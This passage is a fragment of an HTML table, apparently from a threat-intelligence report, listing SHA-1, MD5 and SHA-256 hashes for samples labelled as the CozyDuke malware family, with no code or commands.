<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6B5EF7B76B35203DD323AF49BFA27CFA7E1B6376</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">c42bf27579eaadfa080134f3400a417b</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">fbbcac3f053a480ca28cc2910c74846af7efb0b291cbe006cf15c612986e5d2c</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">71C59EAA445346251467942BAC489A9D4E807F7F</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">69cab1853df0749d42b68bf41d78e655</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">c3329be592d90fdc0383d05ae9c251b3387f366f2aeb57ac595a5538aea0bfd9</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">75AEAEE253B5C8AE701195E3B0F49308F3D1D932</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">95b3ec0a4e539efaa1faa3d4e25d51de</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">7765A0869530C1A17B8FD339BBE55CC4C1BDBA30</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">5ebce6cbedfec82f1428c3409e3df0ef</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">89cd924e6bb24ea151ba653573c64f07b22802473ea94c63c2c94843172998d6</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">78E9960CC5819583FB98FB619B33BFF7768EE861</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">181a88c911b10d0fcb4682ae552c0de3</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">a5373b33ac970dedeb52528b123959145bf51c95b159a30a7823ad8018ac4b41</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">7C710CF31F20EF7E0AD1809672255D4EDFDFF052</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">83acacbd57997f6326817f709f857893</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6e7f6146b428af5eaec4dec1616df980764110120ae54bb765ae662c87496d50</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">87668D14910C1E1BB8BBEA0C6363F76E664DCD09</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f58a4369b8176edbde4396dc977c9008</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">30c69d91247f8a72a69e4d7c4bce3eafba40975e5890c23dc4dbe7c9a11afa73</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">883292F00E5836F99A1943A6E0164D8C6C124478</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">bc626c8f11ed753f33ad1c0fe848d898</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">8853979fce0f767b495abd55b696203209e95f04aaefe16c52c1724d07972154</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">8B357FF017DF3ED882B278D0DBBDF129235D123D</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">3d3363598f87c78826c859077606e514</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">8BA7932A40008881A4ED975F52271C0B679EAFF2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">45d6515ebb7f57404b8703f1e77a461a</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">99f53b96a264b56542cd0f7c631339f8a3f3bdd3817fc9fddcdf44edd91ea90e</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">8C3ED0BBDC77AEC299C77F666C21659840F5CE23</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">e8510a7ae4919a3fcedad985fbbca352</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">18c0b02776487babbf6219cdaf97cbf2b534e0cf87a527228dda2d4a468a257f</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">8F1AC45360196A7B5A1680FF839A131394E9D9B4</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">9e3c39aaa240da8c7002924170019f78</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">84a941d828813301c2634c6a818b9d7455c6493a073a0646d9a4e263a5a0e082</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">9319BF72000F8E468C182947DD5C82FB8B9AE419</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1ff0ed11fc6a41db458a75ae71670f94</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">509347f4a5b81a65e327363b9eb6773d57cb6df0c834bfdb19eda8defcfecadb</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">93D53BE2C3E7961BC01E0BFA5065A2390305268C</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">90bd910ee161b71c7a37ac642f910059</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ff9edb92ee8125519aa1eea60cab9999bcd4caa87b891882caddc73a2a5ae9cf</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">93EE1C714FAD9CC1BF2CBA19F3DE9D1E83C665E2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f02da961eb7b87b41aee5fd9537022f0</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ac4ffc7a2ba8840a20f6b07aa44328f1802b79ced6a56b3ac7e78fa1178ba65a</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">94520B93510DB0DC10387A65E0A46F45AB501226</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">50992eefe5df1c85dde85dc008b5010d</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">64533e377bc50faa161ebf98639385c119de07dd22ed2525b26bfba608e4da95</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">9B56155B82F14000F0EC027F29FF20E6AE5205C2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">9ad55b83f2eec0c19873a770b0c86a2f</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">7cdb9c2e8b6ca7f0a683a39c0bdadc7a512cff5d8264fdec012c541fd19c0522</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">9F8F1672594A6FBAC43793C857DD7718E75F328A</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">c79bf9a04913a5018ab8de65ffd1060f</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">463e19dfd8dc9a2712deb50ccbe2bf59693cee322fb6f0d45d333e34fe4a3d45</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">A38EA2533E3DFA6339726AAFD4BC2BC7E3EEC529</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6f535a0f5c7f710ec4739e52f35a5673</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">95f8e91fb2059954866e52459cb88f5ff7b2aea590fce587e51f1140222ef27f</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">AC2B5928F46069111F4334F650A7DBF1B5F026D5</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">fef254d6c46fdced294db44acef8d839</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">da3ee90d5ae8b82775567bc35896f7752b5f9a1eb686feb2e32f376e8e936e7a</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">B26BC0A3E35C474F7099BD2B066F1680F3394B14</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">66d2b5ed8646a0ef38eef822555b9828</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6b31c287e93d7d4a5a92a5ad50ee903534af4ee34ed2879b002b139eaed7510d</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">B5E973DF0A159AB583FC8923C796C8CBF5B535DF</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">864bb9137f6bf94e59fbaa9b21065d1e</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6b8d05118610f97f7fee199e29c193ef763f344b425a01b6cf471ec591ad4280</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">BDD2BAE83C3BAB9BA0C199492FE57E70C6425DD3</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">416db420e781c709bb71acee0b79282f</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">4bcb2a5d99297b30f8ff00e08cf7330d5e2f69fc602bb317bf8e9f703a137a99</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">BF265227F9A8E22EA1C0035AC4D2449CEED43E2B</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1dde02ff744fa4e261168e2008fd613a</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">418a21d49fe5bca8a3e050f039a0e2aa03db6d2de0fb49e3ff9d987f31b22dda</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">BF9D3A45273608CAF90084C1157DE2074322A230</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">43c012086c1ae0a67c38b0926d6cba3f</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">3dea35172449f0b9a86dff9af3b4480cc4c37a30e8cb54963ff91c4c1ffe7b0d</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">C117608DAB3AB632DE8110F8981DD7E773C61D05</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2aabd78ef11926d7b562fd0d91e68ad3</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f9ff78669e4b251ac1e31076eaf420bee6f2060dbc926cc33603f893658ca86c</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">C3D8A548FA0525E1E55AA592E14303FC6964D28D</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f16dff8ec8702518471f637eb5313ab2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2b160b7eef5ce5fdb83889f96fc40cbbbc7b85450ff2afdf781a8eb5d6a0f541</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">C3FDE950FE7D668805B40B1680D519F20C18B899</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f16629ad4bc9473ef4978d6a3dd551f1</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ea8357db1071cda3e9a63592e584410d071673433a89215c220e0e7310729229</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">C62E840FFE4BBA50F6584B33A877475F0EBCF558</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">10b852b9f669aa6ec60bc838dbee6de3</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">aaea9387a63a20aed6e41029ea14af41a76e09069fd3aa7f7fa210f540f42b9a</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">C6472898E9085E563CD56BAEB6B6E21928C5486D</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">98a6484533fa12a9ba6b1bd9df1899dc</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">9891b5586cede16aa1e1b87380621f68e8956b991cf7675bbe18d2ec61a7522f</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">C8FE2296565C211E019CDAD3918A5736D4B12D44</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">93176df76e351b3ea829e0e6c6832bdf</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">950c8f9dbec3a2a1603f9202408cf49ea5a9573c7296e5940a42581cbd6fc8c2</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CCF83CD713E0F078697F9E842A06D624F8B9757E</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">acffb2823fc655637657dcbd25f35af8</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">262dbadca239e5259161130ac9f0f5ef50691fd9dc3e3490b6c0d7b76e7ee34e</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CE9D077349638FFD3E1AD68CDA76C12CFB024069</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">4121414c63079b7fa836be00f8d0a93b</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">fde146d9d8c42d3b7803285bfa73976b81234f9ef37a16f9319929ec1e686bb3</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CEBCF2F495C3B95138128D0577DCAC5CDE29490D</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">3a746f525877b3d006758def2957ddaf</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">4d5d056e501bc3fca73a156b23e05612bd2fc7f09b44745766b98b6ca2599bfb</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">D3254F1F4C4DEF8C023982DFB28FA31E91B69AB5</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">cb52ba412736c9966c02265946b0fdb0</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">9d217fc19800472327465066f4cf369df9ef9c43dd3822af1d7cda79c74e7793</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">D5CBF554E4E700B37DDCB026D4407FCD87032D87</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">3dce9f631cc0b8a1b1bdc1b4671e2569</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6928d9fda1b31c72067ba2a1d3f21efe8595f6e8d54a196ccabbc953f10b2d38</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">E0779AC6E5CC76E91FCA71EFEADE2A5D7F099C80</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">209a4a102a977b698544c99d8236e9ca</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">86056f462d5783604b7f050047db210ecf698e72f3664b27d58265663ff5b324</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">E76DA232EC020D133530FDD52FFCC38B7C1D7662</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">62c4ce93050e48d623569c7dcc4d0278</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f44bead117d2cf34b8e50b81c82fbd1b938b94387cdf84386ace46b1f3b5df1a</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">E99A03EBE3462D2399F1B819F48384F6714DCBA1</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1a262a7bfecd981d7874633f41ea5de8</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">099524703c250d1d1a16288dbd2f425d6cd0491f608e207a82f239b39bb26b7e</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">EA0CFE60A7B7168C42C0E86E15FEB5B0C9674029</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">eb22b99d44223866e24872d80a4ddefd</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f722677df4fb7eb4ac986a944d4f6630b91ac22b31f8d39ec9bf941376d5d4db</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">EB851ADFADA7B40FC4F6C0AE348694500F878493</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">b5553645fe819a93aafe2894da13dae7</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1a7239c006a3adf893bdb5c2300b2964ed8bb454e1b622853e4460707dc63c16</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">F2FFC4E1D5FAEC0B7C03A233524BB78E44F0E50B</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">9f65e3b320ec91380ebc28d4fdff4895</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">8a5d8d103cb175d7dc41932ef9a890997e25dbe15f94ecd2105835fe49779354</span></td></tr>
